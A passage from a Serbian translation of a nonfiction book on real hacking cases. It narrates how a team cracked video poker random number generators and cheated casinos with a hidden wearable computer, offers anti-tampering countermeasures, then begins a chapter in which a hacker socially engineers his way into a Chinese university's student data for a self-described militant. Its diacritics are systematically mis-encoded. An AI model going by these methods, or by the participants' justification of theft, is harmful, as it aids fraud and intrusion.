ureœaje. On je pogreãno ugradio algoritam – a moæda je to uradio i


brojeva mnogo sloæeniji: aparat je koristio dva generatora koji su se kombinovali, umesto samo jednog. “Programeri su bili mnogo svesniji moguñnosti upada hakera”, zakàuåio je Aleks. Ali i ovde su åetvorica otkrila bitnu greãku projektanata. “Verovatno su na papiru proåitali da se nasumiånost poveñava ako dodate drugi registar, ali to su uradili pogreãno.” Da bi se odredila bilo koja karta, broj iz prvog generatora sluåajnih brojeva sabiran je s brojem iz drugog. Da bi ovo ispravno funkcionisalo, drugi generator bi morao da “kruæi” – tj. da meça svoju vrednost – nakon deàeça svake karte. Projektanti to nisu uradili; programirali su drugi registar da kruæi na poåetku svakog deàeça, pa se za svaku kartu u jednom deàeçu rezultatu prvog registra dodaje isti broj. Koriãñeçe dva registra bio je izazov za Aleksa – “zadatak iz kriptologije”. Liåilo mu je na korake koji su se ranije koristili u ãifrovaçu poruka. Mada je znao poneãto o toj temi, to nije bilo dovoàno da pronaœe reãeçe, pa je poåeo da putuje do obiliæeçe univerzitetske biblioteke i istraæuje.

Umeñe provale

14

namerno – pa je prostor za kàuå ãifre smaçen sa 56 bitova na 30. Åak i u to vreme, bilo je moguñe “na silu” pogoditi 30-bitni kàuå. Svako ko je koristio ovaj proizvod neosnovano se oseñao bezbednim: napadaå je mogao da otkrije kàuå u razumnom vremenskom periodu i doœe do podataka. Tim je otkrio istu vrstu greãke u programskom kodu aparata. Dok su radili na raåunarskom programu koji bi im omoguñio da dobiju na novoj ciànoj maãini, momci su pritiskali i Aleksa da osmisli pristup koji neñe zahtevati da tråe do govornice. Inspiraciju za reãeçe pronaãli su na stranama kçige Eudaemonic Pie : “nosivi” raåunar. Aleks je izumeo sistem saåiçen od minijaturnog kompjutera, napravàenog oko male mikroprocesorske ploåe koju su Majk i Marko pronaãli u katalogu. Uz çu je iãlo i kontrolno dugme koje je moglo stati u cipelu, i beãumni vibrator poput onih iz danaãçih mobilnih telefona. Sistem su zvali svojim “dæepnim kompjuterom”. “Morali smo da smislimo kako da ga napravimo na malom åipu s malom memorijom”, priåa Aleks. “Napravili smo fin hardver, pa je sve moglo da stane u cipelu i bilo je ergonomskog oblika.” (“Ergonomski” je u ovom sluåaju znaåilo da je ureœaj bio dovoàno mali da moæete hodati bez hramaça!)

Novi napad Tim je poåeo da isprobava novu ãemu, a to je priliåno uticalo na çihove æivce. Naravno, viãe nije bilo sumçivog tråkaça do govornice pre svakog osvajaça novca. Ali, i pored svih generalnih proba u çihovoj “kancelariji”, premijera je bilo izvoœeçe pred priliåno velikom publikom uvek sumçiåavih àudi iz obezbeœeça. Ovaj put program je napravàen tako da duæe mogu da sede za jednim aparatom, osvajajuñi viãe maçih, i maçe sumçivih svota. Aleks i Majk se priseñaju napetosti dok opisuju kako je sistem radio.

Aleks: Obiåno bih raåunar stavàao u dæep, u neãto ãto je liåilo na mali tranzistorski radio. Sproveo bih æicu od raåunara u åarapu i u prekidaå koji se nalazio u cipeli. Majk: Ja sam svoj lepio za ålanak. Prekidaåe smo napravili od komadiña ploåe za konstruisaçe modela elektronskih kola (engl. breadboard). Komadi su bili kvadratiñi strane oko jedan


inå, s minijaturnim dugmetom. Zaãili smo i paråe lastiãa koje ñe iñi oko palca. Onda iseåete rupu u uloãku Dr. Sholl da bi ureœaj stojao mirno u cipeli. Bilo je neudobno samo ako ste ga nosili ceo dan – tada je postajalo pravo muåeçe. Aleks: I onda uœete u kazino i pokuãavate da izgledate smireno, ponaãate se kao da nema niåega, kao da vam pantalone nisu pune æica. Odete tamo i poånete da igrate. Imali smo ãifru, kao Morzeova azbuka. Ubacite pare i napravite neãto kredita da ne biste morali stalno da ubacujete novåiñe, i poånete da igrate. Oznake za podeàene karte unesete pritiskajuñi dugme u cipeli. Signal od dugmeta u cipeli odlazi do raåunara u dæepu pantalona. Za ranije maãine trebalo je sedam ili osam karata da biste sinhronizovali raåunar. Aparat podeli pet karata, povuåete joã tri, ãto je uobiåajena stvar. Na primer, zadræite par, a zamenite ostale tri, i dobijete osam karata. Majk: Kôd koji ste ukucavali preko dugmeta u cipeli bio je binaran i koristio je tehniku komprimovaça sliånu onome ãto se naziva Hafmanov kôd. Tako je dug pa kratak pritisak oznaåavao jedan-nula, ãto je binarna oznaka za dva. Dva duga pritiska bila su jedan-jedan, binarna oznaka za tri, itd. Ni za jednu kartu nam nije trebalo viãe od tri pritiska. Aleks: Ako ste dugme dræali pritisnuto tri sekunde, to je znaåilo otkazivaçe. I [raåunar] se odazivao – na primer, dupdup-dup je znaåilo “OK, spreman sam za unos”. Unoãeçe podataka smo veæbali – morali smo da se koncentriãemo i uåimo kako se to radi. Nakon nekog vremena, mogli smo da ukucavamo i dok smo razgovarali sa osobàem u kazinu. Poãto bih uneo kôd i identifikovao oko osam karata, to je bilo dovoàno za sinhronizovaçe sa oko 99 procenata sigurnosti. Otprilike u roku od nekoliko sekundi do minut, raåunar bi triput zazujao. Spreman sam za akciju.

Raåunar u dæepu pronaãao je mesto u algoritmu koje predstavàa upravo podeàene karte. Poãto je çegov algoritam bio isti kao onaj u video poker aparatu, za svako novo deàeçe raåunar je “znao” kojih pet dodatnih karata åeka nakon ãto igraå izabere karte koje ñe odbaciti, i signalizirao je koje karte treba zadræati da bi se osvojio dobitak. Aleks je nastavio:

Umeñe provale

16

Raåunar vam javàa ãta da uradite tako ãto ãaàe signale vibratoru u vaãem dæepu. Vibratore smo nabavili besplatno tako ãto smo ih iãåupali iz starih pejdæera. Ako treba da zadræite treñu i petu kartu, kompjuter bi se oglasio sa bip, bip, biiip, bip, biiip, ãto ste oseñali kao vibracije u svom dæepu. Izraåunali smo da, ako igramo paæàivo, imamo izmeœu 20 i 40 procenata dobiti, ãto znaåi prednost od 40 procenata u svakom deàeçu. To je odliåno – najboài svetski igraåi blek dæeka ostvare oko dva i po procenta. Ako sedite za aparatom u koji se ubacuje 5 dolara i odjednom ubacujete po pet kovanica, dvaput u minutu, moæete zaraditi 25 dolara za minut. Za pola sata mogli biste lako zaraditi 1.000 dolara. Svaki dan se nekome tako posreñi. Oko 5 procenata igraåa koji sede i igraju pola sata mogli bi postiñi toliko. Ali to im se ne deãava svaki put. Mi smo bili u tih 5 procenata kad god bismo seli. Svaki put kada bi neko od çih osvojio veñu sumu u jednom kazinu, preãao bi u drugi. Obiåno su uzimali po åetiri ili pet dobitaka zaredom. Kada bi se posle mesec dana vratili u taj kazino, posetili bi ga u drugo doba dana da bi zatekli drugu smenu osobàa, àude koji ih neñe prepoznati. Poåeli su da poseñuju i kazina u drugim gradovima – Rinou, Atlantik Sitiju itd. Putovaça, kockaçe i osvajaçe, postepeno su postali rutina. Meœutim, jednom prilikom Majk je mislio da je doãao trenutak od kog su svi strepeli. Upravo se naoãtrio i prvi put je igrao na aparatu u koji se ubacuje 25 dolara, ãto je poveñavalo napetost – ãto je vrednost maãine veña, to vas paæàivije posmatraju.

Bio sam pomalo nervozan, ali stvari su iãle boàe nego ãto sam oåekivao. Osvojio sam oko 5.000 dolara za relativno kratko vreme. A onda me je jedan ogroman tip potapãao po ramenu.

Pogledao sam ga oseñajuñi blagu muåninu u stomaku. Pomislio sam: “To je to”. “Primetio sam da veñ neko vreme igrate”, rekao je. “Æelite li roze ili zelenu?” Da sam to bio ja, zapitao bih se: “Ãta – da izaberem boju koje æelim da budem kada me prebiju na mrtvo ime?” Mislim da bih ostavio sav svoj novac i pokuãao da zbriãem. Majk kaæe da je veñ bio dovoàno iskusan da ostane smiren.

Åovek je rekao: “Æelimo da vam poklonimo ãoàu za kafu.”

Uhvañen! Aleks i Majk su se trudili da se disciplinovano dræe “odreœenih pravila koja ñe sigurno smaçiti verovatnoñu da nas primete. Na primer, pazili smo da nikada ne uzimamo previãe novca na istom mestu, da na istom mestu nikada ne osvajamo novac previãe åesto, da ne uzimamo novac mnogo dana zaredom.”


Majk je odabrao zelenu. Marko je imao sopstveni napet momenat. Åekao je na dobitno deàeçe kada mu je priãao nadzornik kog nije primetio. “Udvostruåili ste sumu na pet hiàada dolara – baã imate sreñe”, rekao je iznenaœeno. Starija gospoœa za susednim aparatom progovorila je hrapavim glasom puãaåa: “Nije to... bila... sreña.” Nadzornik se ukoåio, i postao sumçiåav. “To je bila petàa”, zagraktala je. Nadzornik se nasmeãio i otiãao daàe. Tokom oko tri godine, momci su naizmeniåno obavàali legalne poslove savetovaça kako bi oåuvali svoje veãtine i kontakte, i povremeno punili dæepove za poker aparatima. Kupili su joã dva aparata, ukàuåujuñi i najviãe koriãñen model video pokera i nastavili da poboàãavaju svoj softver. Na putovaçima je svaki od tri ålana tima iãao u razliåit kazino, nisu iãli “u åoporu”, priåao je Aleks. “Tako smo otiãli samo jednom ili dvaput, ali to je bilo glupo.” Iako su se dogovorili da ñe jedan drugom javàati ãta nameravaju, povremeno bi se neko od çih iskrao u kockarske gradove ne prijavàujuñi ostalima. Igrali su samo u kazinima, nikad na mestima kao ãto su dragstori ili supermarketi, jer su tamo “dobici uglavnom vrlo mali”.

17

Umeñe provale

18

Ali Majk je tu disciplinu shvatao ozbiànije i smatrao je da druga dvojica nisu dovoàno oprezni. Viãe je voleo da osvaja neãto maçe novca na sat, ali da izgleda kao i drugi tipiåni igraåi. Ako bi deàeçem dobio dva keca, a kompjuter mu rekao da odbaci jednog ili oba keca da bi dobio joã boàe karte – na primer tri æandara – on to nije radio. U svim kazinima postoje kamere kojima upravàa obezbeœeçe smeãteno iznad dvorane za kockaçe. One se mogu okretati, fokusirati i zumirati u potrazi za prevarantima, podmiñenim sluæbenicima kazina i drugima koji nisu uspeli da odole tolikom novcu. Ako bi se desilo da neko iz obezbeœeça viri u Majkov aparat, odmah bi znao da tu nisu åista posla – nijedan razuman igraå ne bi odbacio par keåeva. Niko ko ne vara ne bi pomislio da slede joã boàe karte. Aleks nije imao tako visoke standarde. Markovi su bili joã niæi. “Marko je bio priliåno drzak” po Aleksovom miãàeçu:

On je vrlo pametan tip, samouk, nikada nije zavrãio sredçu ãkolu, ali je bio jedan od onih sjajnih Istoånoevropàana. I bio je vrlo uoåàiv. Znao je sve o raåunarima, ali je umislio da su àudi zaposleni u kazinima glupi. Nije bilo teãko pomisliti tako neãto s obzirom na to da smo uspevali da im izvuåemo toliki novac. Pa ipak, åini mi se da je postao previãe samouveren. Previãe se osilio, a nije se ni uklapao u profil tipiånog igraåa jer je izgledao kao klinac iz inostranstva. Mislim da je zato budio sumçe. Takoœe, nije iãao sa devojkom ili suprugom, koja bi pomogla da se boàe uklopi. Mislim da je na kraju poåeo da radi stvari koje su privlaåile paæçu. Takoœe, kako je vreme prolazilo, svi smo se okuraæili, pa smo poåeli da igramo na skupàim aparatima koji su davali boàe dobitke, ãto je operaciju åinilo riziånijom. Iako se Majk s tim ne slaæe, Aleks je nagovestio da su sva trojica voleli da rizikuju i da su stalno pomerali granice proveravajuñi koliko daleko mogu da idu. O tome je rekao: “Jednostavno, stalno poveñavate rizik.” Doãao je dan kada je Marko u jednom trenutku sedeo za aparatom u kazinu, a u sledeñem je bio okruæen gomilom àudi iz obezbeœeça koji su ga vukli i gurali u zadçu sobu za razgovor. Aleks je prepriåao dogaœaj.

Snimili su mu anfas i profil, i oduzeli mu kompjuter i sav novac koji je imao – oko 7.000 dolara u keãu. Nakon oko jednog sata ispitivaça, ili moæda duæe – bio je previãe uzrujan da bi bio siguran koliko je trajalo – pustili su ga. Marko je pozvao svoje partnere na putu kuñi. Zvuåao je izbezumàeno. Rekao je: “Da vam ispriåam ãta se desilo. Zeznuo sam stvar.” Majk je odmah otiãao u çihov ãtab. “Aleks i ja smo ãiznuli kada smo åuli ãta se desilo. Ja sam poåeo da rastavàam aparate i bacam delove svud po gradu.” Aleks i Majk su bili àuti ãto je Marko nepotrebno rizikovao. Nije hteo da postavàa dugme u cipelu kao çih dvojica, tvrdoglavo insistrajuñi da ureœaj nosi u dæepu jakne i pokreñe ga rukom. Aleks je opisao Marka kao tipa koji je “mislio da su àudi iz obezbeœeça toliko glupi da je mogao pod çihovim nosem da bude sve drskiji.” Aleks je ubeœen da zna ãta se desilo, iako nije bio prisutan. (Zapravo, çih trojica nisu znali da je Marko otiãao u kazino, uprkos dogovoru da se meœusobno obaveãtavaju o planovima.) Po Aleksovom miãàeçu,


Bilo je straãno jer ste stalno sluãali priåe o tim tipovima koji mlate àude kao volove u kupusu. Oni su bili åuveni po geslu “J_ã policiju, sami ñemo se postarati za ovo.” Marko je bio uplaãen, ali on je vrlo åvrst lik. Na neki naåin mi je drago ãto je baã on uhvañen, ako je iko od nas morao da padne, jer mislim da je on bio najsposobniji da se izbori s tom situacijom. Koliko znam, sliåne stvari je preæiveo u Istoånoj Evropi. Pokazao je lojalnost i nije nas izdao. Nije pomiçao partnere niti bilo ãta sliåno. Bio je nervozan i uznemiren, ali je ostao åvrst pred paàbom i rekao im je da je radio sam. Rekao je: “Åekajte, da li sam ja uhapãen, jeste li vi policija, u åemu je stvar?” Bilo je to ispitivaçe kao u kriminalistiåkoj sluæbi, osim ãto ti àudi nisu bili policija i nisu imali nikakav stvaran autoritet, ãto je pomalo åudno. Nastavili su da ga ispituju, ali ga nisu stvarno maltretirali.

Umeñe provale

20

“Videli su da on osvaja nemoguñe sume i da se neãto åudno deãava s çegovom rukom.” Marko prosto nije brinuo o tome ãta bi moglo skrenuti paæçu osobàa i pobuditi sumçu. To je bio kraj i za Aleksa, mada nije skroz siguran da su i ostali prestali da varaju. “Na poåetku smo odluåili da, ako iko od nas bude uhvañen, svi prestajemo.” Rekao je: “Koliko ja znam, svi smo se toga pridræavali.” Ubrzo zatim je, maçe siguran, dodao: “Bar ja jesam.” Majk se sloæio, ali nijedan od çih nikada to pitaçe nije direktno postavio Marku. Kazina obiåno ne tuæe napadaåe poput çih åetvorice. “Razlog za to je ãto ne æele da objave da imaju ovakve slabosti”, objaãçava Aleks. Obiåno se zavrãava reåima: “Izgubi se pre zalaska sunca. Pustiñemo te ako obeñaã da viãe nikada neñeã kroåiti u ovaj kazino.”

Epilog Oko ãest meseci kasnije, Marko je primio pismo u kom je pisalo da protiv çega neñe biti podneta tuæba. Njih åetvorica su i daàe prijateài, mada danas nisu toliko bliski. Aleks misli da je u ovoj avanturi zaradio oko 300.000 dolara, a deo tog novca otiãao je Lariju, kao ãto su se dogovorili. Tri partnera koja su iãla u kazina i preuzela sav rizik, prvo su se dogovorila da ñe podeliti novac na jednake delove, ali Aleks misli da su Majk i Marko verovatno uzeli oko 400.000 do pola miliona dolara svaki. Majk nije potvrdio da je dobio viãe od 300.000 dolara, ali priznaje da je Aleks verovatno izvukao maçe od çega. Radili su oko tri godine. Uprkos novcu, Aleks je bio sreñan kada je bilo gotovo: “Na neki naåin, osetio sam olakãaçe. Sva zabava je iãåezla. To nam je postalo kao posao. I to riziåan.” Ni Majku nije bilo krivo ãto se sve zavrãilo, i blago se æalio da je “postalo nekako naporno”. Obojica su na poåetku oklevali da ispriåaju svoju priåu, ali su sa uæivaçem prihvatili zadatak. A zaãto i ne bi – tokom desetak godina otkako se sve desilo, nijedan od çih åetvorice nikada nikome nije ni proãaputao o tim dogaœajima osim suprugama i devojci, koje su bile deo cele stvari. Na neki naåin, bilo je olakãaçe ispriåati sve po prvi put, pod zaãtitom dogovora o potpunoj anonimnosti. Oåigledno su uæivali u otkrivaçu detaàa, a Majk je priznao: “To je bila jedna od najuzbudàivijih stvari koje sam ikada uåinio.”

Aleks verovatno govori u ime svih iznoseñi svoj stav o ovoj ludoriji:

Aleks kaæe da tako neãto danas ne bi pokuãao. Meœutim, çegovi razlozi ñe vas moæda iznenaditi: “Pronaãao sam druge naåine da doœem do novca. Da je moja finansijska situacija ista kao tada, verovatno bih pokuãao opet.” Misli da je ono ãto su uradili sasvim opravdano. U ovoj igri maåke i miãa, maåka stalno uåi nove trikove koje miã izvodi i preduzima odgovarajuñe mere. Slot maãine danas koriste mnogo boài softver, pa momci nisu sigurni da li bi uspeli ponovo da ih provale. Ipak, nikada neñe postojati savrãeno reãeçe za bilo koje pitaçe tehnoloãke bezbednosti. Aleks je taj problem slikovito predstavio: “Svaki put kada neki [programer] kaæe: ’Niko se neñe muåiti oko toga‘, naœe se klinac u Finskoj raspoloæen da se pomuåi.” I to ne samo u Finskoj, nego i u Americi.

SAÆETAK Tokom devedesetih, kazina i projektanti kockarskih aparata nisu shvatali neke stvari koje su kasnije postale oåigledne. Generator pseudosluåajnih brojeva ne generiãe zaista nasumiåne brojeve. Umesto toga, on skladiãti listu nasumiåno poreœanih brojeva. U ovom sluåaju, to je veoma duga lista: sa stepenom od 2 do 32, ili otprilike milijardu brojeva. Na poåetku ciklusa, program nasumiåno bira mesto u listi. Ali nakon toga, sve dok ne poåne nov ciklus igre, on koristi sledeñe brojeve sa liste, jedan za drugim.


Ne oseñam se nimalo loãe zbog novca koji smo uzeli. To je samo kap u moru novca u toj industriji. Da budem iskren, nikada nismo oseñali griæu savesti, jer su to kazina. Sve smo lako racionalizovali. Krali smo od kazina koji su krali starim gospoœama nudeñi igre u kojima ne mogu da dobiju. Vegas je kao mesto u kom su àudi utaknuti u maãine za isisavaçe novca, i one im isisavaju æivot – novåiñ po novåiñ. Oseñali smo se kao da se svetimo Velikom Bratu, a ne kao da nekoj jadnoj starici otimamo dæek pot. Napravili su igru u kojoj se kaæe “Izaberi odgovarajuñe karte i dobiñeã novac”. Mi smo birali odgovarajuñe karte. Jedino ãto oni nisu oåekivali da to ikome poœe za rukom.

Reverznim inæeçeringom (tj. povratnom analizom) softvera momci su doãli do liste. Sa bilo koje poznate taåke u “nasumiånoj” listi, oni su mogli da utvrde sledeñi broj na listi, a pomoñu dodatnog poznavaça brzine ponavàaça za konkretnu maãinu, mogli su da odrede koliko ñe minuta i sekundi proñi pre nego ãto aparat prikaæe fleã rojal.

PROTIVMERE

Umeñe provale

22

Proizvoœaåi svakog proizvoda koji koristi ROM åipove i softver moraju predvideti bezbednosne probleme. A svaka kompanija koja koristi proizvode zasnovane na softveru i raåunarima – ãto danas znaåi gotovo svaka kompanija, sve do radçi s jednim åovekom – biñe u opasnosti ako pretpostavi da su tvorci sistema razmiãàali o svim çegovim slabostima. Programeri softvera u japanskim slot aparatima napravili su greãku jer nisu razmiãàali mnogo unapred o svim vrstama napada koji bi mogli biti izvedeni. Nisu preduzeli nikakve mere bezbednosti kojima bi spreåili àude da doœu do firmvera. Trebalo je da predvide da ñe neko doñi do aparata, ukloniti ROM åip, proåitati firmver i doñi do programskih instrukcija koje aparatu govore kako da radi. Åak i ako su razmotrili tu moguñnost, verovatno su pretpostavili da sâmo poznavaçe naåina rada maãine nije dovoàno, i smatrali da ñe sloæenost izraåunavaça potrebnih za provaàivaçe generatora sluåajnih brojeva osuditi svaki takav pokuãaj na neuspeh. To je danas moæda i taåno, ali u ono vreme nije bilo. Recimo da vaãa kompanija prodaje hardverske proizvode koji sadræe kompjuterske åipove. Ãta treba da uradite da biste obezbedili adekvatnu zaãtitu protiv suparnika koji hoñe da zaviri u vaã softver, protiv strane kompanije koja hoñe da napravi jeftinu kopiju, ili hakera koji hoñe da vas prevari? Prvi korak: oteæajte dolazak do firmvera. Za to postoji nekoliko naåina, ukàuåujuñi sledeñe: Kupujte åipove koji su napravàeni tako da su osigurani od napada. Nekoliko kompanija prodaje åipove dizajnirane specijalno za situacije kada postoji velika opasnost od napada. Koristite pakovaçe “chip on-board” – dizajn u kom je åip ugraœen u ploåu sa elektronskim kolima i ne moæe se izdvojiti kao poseban element.

Zapeåatite åip epoksidnom smolom, pa ñe se slomiti ako neko pokuãa da ga ukloni s ploåe. Da biste poboàãali ovu tehniku, u smolu dodajte aluminijumski prah. Ukoliko napadaå pokuãa da ukloni åip zagrevaçem smole, aluminijum ñe ga uniãtiti. Koristite dizajn “Ball Grid Array” (BGA). U takvom rasporedu konektori ne izlaze iz bokova åipa, veñ ispod çega, pa je teãko, åak i nemoguñe, uhvatiti tok signala iz åipa dok je on postavàen na ploåu. Joã jedna protivmera je uklaçaçe svih oznaka sa åipa. Time ñete napadaåa liãiti informacija o proizvoœaåu i vrsti åipa. Priliåno uobiåajen postupak, koji su koristili proizvoœaåi aparata iz ove priåe, zahteva koriãñeçe kontrolnih zbirova (“heãiraçe”) – ukàuåivaçe rutine check-sum u softver. Ukoliko se program izmeni, kontrolni zbir neñe biti ispravan i softver neñe pokrenuti ureœaj. Meœutim, umeãniji hakeri koji su upoznati sa ovim pristupom, jednostavno pregledaju softver da bi videli postoji li u çemu rutina check-sum, i iskàuåe je ukoliko je pronaœu. Znaåi, mnogo je boàe da iskoristite jednu ili viãe metoda fiziåke zaãtite åipa.

Ukoliko je vaã firmver privatan i vredan, pregledajte najboàe izvore podataka o bezbednosti i otkrijte koje tehnike hakeri trenutno koriste. Prenosite najnovije informacije svojim projektantima i programerima. I obavezno preduzmite sve odgovarajuñe korake da biste postigli najviãi nivo bezbednosti srazmeran troãkovima koje biste mogli imati zbog upada.


ZAKLJUÅAK

23

Poglavlje 2 Kad teroristi pozovu Ne znam zaãto sam nastavio s tim. Zbog opsesivne prirode? Æeœi za novcem? Æudçe za moñi? Mogao bih nabrojati mnogo razloga. – ne0h

D

vadesetogodiãçi haker koji se potpisuje kao Comrade (Drug) ovih dana provodi vreme u kuñi u finom kraju Majamija, koja pripada çemu i çegovom bratu. Otac æivi s çima, ali samo zato ãto je brat joã uvek maloletan, a Sluæba za brigu o deci zahteva da odrasla osoba æivi u kuñi dok deåak ne napuni 18. Brañi to ne smeta, a tata ima svoj stan na drugom mestu, i preseliñe se u çega kad za to doœe vreme. Comradeova mama je umrla pre dve godine i ostavila kuñu sinovima jer su ona i çihov otac bili razvedeni. Ostavila im je i neãto gotovine. Njegov brat ide u sredçu ãkolu, a Comrade “samo visi po kraju”. Veñi deo porodice to ne odobrava, ali on kaæe da ga “uopãte nije briga”. Kada vrlo mladi dospete u zatvor – zapravo, ako ste najmlaœa osoba koja je ikada osuœena kao haker na osnovu federalne optuænice – iskustvo ñe verovatno promeniti vaã sistem vrednosti. Naravno, hakerisaçe ne poznaje meœunarodne granice, pa nije åudno ãto je Comradeov prijateà haker, ne0h (nio), otprilike 4.500 km daleko. Hakerisaçe ih je zbliæilo i skrenulo ih na stranputicu koja je, ispostavilo se, vodila sluæeçu interesima meœunarodnog terorizma preko upada u veoma osetàive raåunarske sisteme. Danas nije lako nositi se s tim teretom.

25

Godinu dana stariji od Comradea, ne0h kaæe: “Koristio sam raåunare otkad sam mogao da dohvatim tastaturu”. Njegov otac je imao prodavnicu raåunarske opreme i vodio je deåaka sa sobom na sastanke s klijentima. Deåak je sedeo na oåevom krilu tokom prodaje. Do svoje jedanaeste godine veñ je pisao dBase kôd za potrebe oåevog posla. U meœuvremenu, ne0h je naiãao na kopiju kçige Takedown (Hyperion Press, 1996) – veoma netaåan opis mojih hakerskih akcija, moje tri godine u bekstvu, i potrage FBI-ja za mnom. ne0h je bio oåaran kçigom:

Umeñe provale

26

Inspirisao si me. Ti si bio moj j_ni mentor. Proåitao sam sve o onome ãto si radio. Hteo sam da postanem slavan kao ti. To ga je motivisalo da postane haker. Svoju sobu je opremio raåunarima, razvodnicima za umreæavaçe, gusarskom zastavom dugom dva metra i – krenuo mojim stopama. ne0h je poåeo da stiåe solidno hakersko znaçe i sposobnosti. Prvo je stekao veãtine, a diskrecija je doãla kasnije. Koristeñi hakerski termin za klince poåetnike, objasnio je: “Dok sam pisao deåje skriptove, meçao sam matiåne strane Web prezentacija i ostavàao svoju adresu e-poãte.” Visio je na IRC prezentacijama (engl. Internet Relay Chat, interaktivni razgovor na Internetu) – elektronskim priåaonicama u kojima se sreñu àudi sa zajedniåkim interesovaçima i u realnom vremenu razmeçuju poruke o pecaçu, starim avionima, kuñnim pivarama, ili bilo kojoj od hiàada drugih tema, ukàuåujuñi i hakerisaçe. Kada na IRC prezentaciji unesete tekst, svi koji su u to vreme na mreæi videñe ãta ste napisali i mogu vam odgovoriti. Mada to mnogi redovni korisnici IRC-a ne znaju, komunikacija se lako moæe evidentirati. Te evidencije dosad verovatno sadræe skoro isti broj reåi kao sve kçige u Kongresnoj biblioteci – a do teksta upisanog u æurbi, bez previãe razmiãàaça o posledicama, moæe se doñi godinama kasnije. Comrade i ne0h su provodili vreme na nekoliko istih IRC prezentacija i tako se rodilo prijateàstvo na daàinu. Hakeri se åesto udruæuju radi razmeçivaça informacija ili izvoœeça grupnih napada. ne0h, Comrade i joã jedan klinac odluåili su da naprave sopstvenu grupu koju su nazvali “Keebler Elves”. Joã nekoliko hakera je imalo pristup razgovorima grupe, ali tri prva ålana nisu ostalima govorili o svojim napadima. “Provaàivali smo u vladine prezentacije radi zabave”, rekao je Comrade. Proceçuje da su provalili u “par stotina” navodno zaãtiñenih vladinih prezentacija.

Razliåite grupe hakera okupàaju se na nekoliko IRC kanala. Meœu çima se izdvaja mreæa Efnet. To je prezentacija koju Comrade opisuje kao “ne baã kompjutersko podzemàe – to je priliåno velika grupa servera”. Ali, na Efnetu je bilo nekih maçe poznatih kanala, mesta koja niste mogli sami da pronaœete, veñ je za çih morao da vam kaæe drugi haker åije ste povereçe zadobili. Ti kanali su, kaæe Comrade, bili “priliåno ilegalni”.

Terorista Kalid baca mamac

Oko 1999, sa mnom je putem e-poãte u kontakt stupio åovek koji je rekao da je militantni aktivista i da se nalazi u Pakistanu. Predstavio se kao Kalid Ibrahim. Rekao mi je da je radio za pakistanske militantne grupe. Da li bi neko u potrazi za naivnim klincima hakerima zaista sebe obeleæio kao teroristu – åak i pre 11. septembra? Na prvi pogled to zvuåi apsurdno. Taj åovek je kasnije tvrdio da je iãao u ãkolu u SAD, da se i sâm pomalo bavio hakerisaçem, i da se povezao s hakerima dok je bio u Americi. U tom sluåaju, on je mogao znati, ili je mislio da zna, kako hakeri razmiãàaju. Svaki haker je do neke mere buntovnik koji æivi po razliåitim standardima i uæiva u savladavaçu sistema. Ako hoñete da privuåete hakera, moæda i nije tako glupo objaviti da i sami krãite pravila i da ste autsajder. Moæda bi priåa upravo tako postala uveràivija, a potencijalni sauåesnici maçe oprezni i sumçiåavi.

27 Poglavlje 2: Kad teroristi pozovu

Oko 1998, na tim “priliåno ilegalnim” kanalima, Comrade je poåeo da nailazi na razgovore o tipu koji se “motao unaokolo”, a predstavàao se kao RahulB. (Kasnije je koristio i identifikaciju Rama3456). “Svima je bilo poznato da je on traæio hakere koji ñe upadati u vladine i vojne raåunare – prezentacije .gov i .mil”, kaæe Comrade. “Kruæile su glasine da je on radio za Bin Ladena. To je bilo pre 11. septembra, pa Bin Laden nije bilo ime koje ste mogli svaki dan åuti u vestima.” Na kraju su se Comradeovi putevi ukrstili s putevima tajanstvenog åoveka koji ñe mu se predstaviti kao Kalid Ibrahim. “Razgovarao sam s çim nekoliko minuta [na IRC-u] i jednom smo priåali telefonom.” Åovek je imao strani akcenat i “definitivno je zvuåalo kao da zove iz inostranstva”. I ne0h je stupio s çim u vezu. Kalid je s çim bio direktniji i otvoreniji.

Umeñe provale

28

A bilo je tu i novca. ne0h je od Kalida dobio ponudu od 1.000 dolara da upadne u raåunarske mreæe jednog kineskog univerziteta – mesto koje ne0h naziva “kineski MIT” (MIT – Tehnoloãki institut Masaåusetsa) – i iz baze nabavi podatke o studentima. Pretpostavio je da je to test i za çegove hakerske sposobnosti i za çegovu genijalnost: kako da upadnete u raåunarski sistem kada ne umete da åitate jezik? I joã teæe: kako da se laæno predstavite kada ne govorite jezik? Ispostavilo se da jezik nije nikakva prepreka za nekog kao ãto je ne0h. Poåeo je da boravi na IRC prezentacijama koje je koristila hakerska grupa gLobaLheLL i preko te grupe se povezao sa studentom raåunarskih nauka na kineskom univerzitetu. Povezao se s çim i zatraæio nekoliko korisniåkih imena i lozinki. Informacije za prijavàivaçe stigle su ubrzo zatim, po sistemu haker hakeru, bez postavàaça pitaça. ne0h je otkrio da je bezbednost raåunara na univerzitetu bila slaba do uæasna, ãto je naroåito neobiåno za tehniåki univerzitet za koji bi se oåekivalo da moæe mnogo boàe. Veñina studenata imala je lozinke iste kao korisniåka imena – istu reå ili frazu. Kratka lista koju je student dostavio bila je dovoàna da ne0h dobije pristup kako bi mogao da poåne elektronsko “çuãkaçe”. Tako je otkrio studenta – zvañemo ga Åeng – koji je pristupao FTP prezentacijama (za preuzimaçe podataka) u SAD. Meœu tim FTP lokacijama, bila je i “warez” prezentacija – mesto za preuzimaçe piratskog softvera. Koristeñi standardan trik laænog predstavàaça, ne0h je skitao po mreæi fakulteta i skupàao lokalni studentski æargon. To je bilo lakãe nego ãto se åini jer “oni uglavnom govore engleski”, kaæe ne0h. Sa Åengom se povezao preko naloga koji je omoguñio da sve izgleda kao da mu ne0h ãaàe poruke iz laboratorije za raåunarske nauke na fakultetu. “Ja sam iz Bloka 213”, elektronski je rekao Åengu, i direktno mu zatraæio imena studenata i adrese e-poãte, kao ãto bi uradio svaki drugi student zainteresovan za kontakt s kolegama. Poãto je veñina lozinki bila jednostavna, ulazak u studentske datoteke nije iziskivao previãe mozgaça. Vrlo brzo mogao je da isporuåi Kalidu podatke iz baze o otprilike sto studenata. “Dao sam mu to, a on je rekao: ’Imam sve ãto mi treba‘.” Kalid je bio zadovoàan. Oåigledno mu ta imena uopãte nisu trebala, samo je hteo da vidi moæe li ne0h zaista da pribavi informacije iz tako udaàenog izvora. “Otprilike tada je poåela naãa veza”, kaæe ne0h. “Mogao sam da obavim posao, on je to znao, i poåeo je da mi daje druge zadatke.”

